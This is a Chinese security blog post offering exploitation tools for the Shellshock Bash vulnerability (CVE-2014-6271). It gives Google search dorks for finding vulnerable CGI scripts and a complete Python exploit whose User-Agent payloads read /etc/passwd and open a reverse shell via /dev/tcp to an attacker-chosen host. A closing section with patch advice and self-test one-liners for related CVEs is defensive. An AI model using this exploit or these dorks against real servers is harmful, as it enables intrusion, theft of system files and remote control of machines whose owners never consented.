CVE-2014-6271 Bash漏洞利用工具

2014-09-27 32,487

ShellShock-712X297

 

 

 

 

 

 

 

 

 

0x01: 相关介绍

国外新爆Bash安全漏洞,威胁远胜“心脏出血”? 

CVE-2014-6271 Bash漏洞详细分析

个人感觉利用方式肯定比HeartBleed简单快捷,只是脆弱点不好找,而且量肯定没OpenSSL多;而HeartBleed对很多VPN渗透很有帮助。

0x02:利用条件和搜索方式

利用条件

 
1.env可控可写
2.派生bash子进程

Google搜索方式

 
filetype:sh inurl:cgi-bin

filetype:cgi inurl:cgi-bin

0x03:php测试工具

http://www.exploit-db.com/exploits/34766/

bash_vul_secpulse

 

php的工具可以稍微改动一下 也可以有回显 和反弹shell 当然也可以直接改cmd命令反弹

 

0x04:Python利用工具

ShellShock_Bash

 

 

#!/usr/bin/env python
#-*- coding:utf8 -*-

import urllib,httplib
import re,urlparse
from ctypes import *
import sys
reload(sys)
sys.setdefaultencoding = 'utf-8'


def bash_exp(url):

    hostname, urlpath = urlparse.urlsplit(url)[1:3]
    try:
        conn=httplib.HTTPConnection(hostname,timeout=20)
        headers={"User-Agent":'() { :;}; /bin/bash -c "id"'}
        conn.request("GET",urlpath,headers=headers)
        res=conn.getresponse()
        if res and res.status == 500:
            windll.Kernel32.GetStdHandle.restype = c_ulong
            h = windll.Kernel32.GetStdHandle(c_ulong(0xfffffff5))
            windll.Kernel32.SetConsoleTextAttribute(h, 12)
            print "SecPulse Hint:Bash of this site is Vulnerable!"
            windll.Kernel32.SetConsoleTextAttribute(h, 7)
            
            cat_passwd(hostname,urlpath)
            
            windll.Kernel32.SetConsoleTextAttribute(h, 10)
            reverseIp = raw_input("Reverse IP & Port Like 255.255.255.1/8080:    ")
            if reverseIp:
                try:
                    conn2=httplib.HTTPConnection(hostname,timeout=20)
                    headers2={"User-Agent":'() { :;}; /bin/bash -i >& /dev/tcp/%s 0>&1' % reverseIp}
                    print "Reversing~"
                    conn2.request("GET",urlpath,headers=headers2)
                    
                except KeyboardInterrupt:
                    print "Process interrupted by user."
                except Exception, e:
                    print e
                
            else:
                print "Nothing Input,Exiting..."
            windll.Kernel32.SetConsoleTextAttribute(h, 7)
        else:
            print "SecPulse.com Hint:No Bash Vulnerable!"
            
    except Exception, e:
        print e


def cat_passwd(hostname,urlpath):
    print "cat /etc/passwd :"
    conn3=httplib.HTTPConnection(hostname,timeout=20)
    headers3={"User-Agent":"() { :;}; echo `/bin/cat /etc/passwd`"}
    conn3.request("GET",urlpath,headers=headers3)
    res3=conn3.getresponse()
    res=res3.getheaders()
    for passwdstr in res:
        print passwdstr[0]+':'+passwdstr[1]
        

if __name__=='__main__':
    
    if len(sys.argv)<2:
        print "Usage: "+sys.argv[0]+" http://www.secpulse.com/cgi-bin/index.cgi"
        sys.exit(-1)
    else:
        bash_exp(sys.argv[1])

 

0x05:Python批量搜索自动化攻击工具

考虑危害性 就不放了

0x06:Cgi大shell一枚

File Manager

Copyright 2003 Gamma Group

0x07:修复方法:

update bash

 

这个漏洞后期演变的很快 因为各种修复被绕过~~~老外的shellshocker.net蛮给力的列举出来了

Exploit 1 (CVE-2014-6271)

There are a few different ways to test if your system is vulnerable to shellshock. Try running the following command in a shell.

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If you see "vulnerable" you need to update bash. Otherwise, you should be good to go.

Exploit 2 (CVE-2014-7169)

Even after upgrading bash you may still be vulnerable to this exploit. Try running the following code.

env X='() { (shellshocker.net)=>\' bash -c "echo date"; cat echo; rm ./echo

If the above command outputs the current date (it may also show errors), you are still vulnerable.

Exploit 3 (???)

Here is another variation of the exploit. Please leave a comment below if you know the CVE of this exploit.

env X=' () { }; echo hello' bash -c 'date'

If the above command outputs "hello", you are vulnerable.

Exploit 4 (CVE-2014-7186)

bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' ||
echo "CVE-2014-7186 vulnerable, redir_stack"

A vulnerable system will echo the text "CVE-2014-7186 vulnerable, redir_stack".

Exploit 5 (CVE-2014-7187)

(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash ||
echo "CVE-2014-7187 vulnerable, word_lineno"

A vulnerable system will echo the text "CVE-2014-7187 vulnerable, word_lineno".

Exploit 6 (CVE-2014-6278)

shellshocker='() { echo You are vulnerable; }' bash -c shellshocker

You shouldn't see "You are vulnerable", if you're patched you will see "bash: shellshocker: command not found"

Exploit 7 (CVE-2014-6277)

bash -c "f() { x() { _;}; x() { _;} <<a; }" 2>/dev/null || echo vulnerable

If the command outputs "vulnerable", you are vulnerable.


If you've tested your system, please leave a comment below. Don't forget to include your bash version and what OS you're running. Type bash --version for bash, and cat /etc/*release* for your OS.

 

原创作者:安全脉搏

SP地址:http://www.secpulse.com/archives/917.html

 

本文作者:SmallFresh

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/917.html

Tags:
评论  (3)
快来写下你的想法吧!

SmallFresh

文章数:1 积分: 0

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号